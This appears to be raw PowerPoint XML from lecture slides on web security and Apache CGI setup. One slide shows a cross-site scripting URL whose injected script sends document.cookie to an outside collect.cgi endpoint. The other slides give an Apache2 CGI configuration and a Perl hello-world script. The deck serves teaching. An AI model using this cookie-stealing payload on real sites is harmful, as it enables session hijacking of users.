              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/&lt;IP&gt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>WealthTracker.cgi?name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>window.open</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>http:/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>www.cis.udel.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>collect.cgi?cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>=”+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3366FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>)&lt;/script&gt; </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1040428243"/>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CGI in Apache2 (1)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Add the following directive into file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/apache2/sites-enabled/000-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>default</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ScriptAlias</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin/ /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Directory "/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>bin”&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>AllowOverride</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>None</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Options </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>ExecCGI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>MultiViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> +</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>SymLinksIfOwnerMatch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Order </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>allow,deny</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>  Allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>all</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/Directory&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="14095527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CGI in Apache2 (2)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>To test </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1" smtClean="0"/>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>, put </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>the following </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>inside </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/lib/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>-bin</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>#!/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>perl</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>Content-type:text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>/html\r\n\r\n";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;html&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;head&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;title&gt;Hello Word - First CGI Program&lt;/title&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;/head&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;body&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;h2&gt;Hello Word! This is my first CGI program&lt;/h2&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;/body&gt;';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>print '&lt;/html&gt;'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0" smtClean="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0"/>
              <a:t>Then do</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chown</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>root:root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> 755 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>hello.cgi</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" dirty="0">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
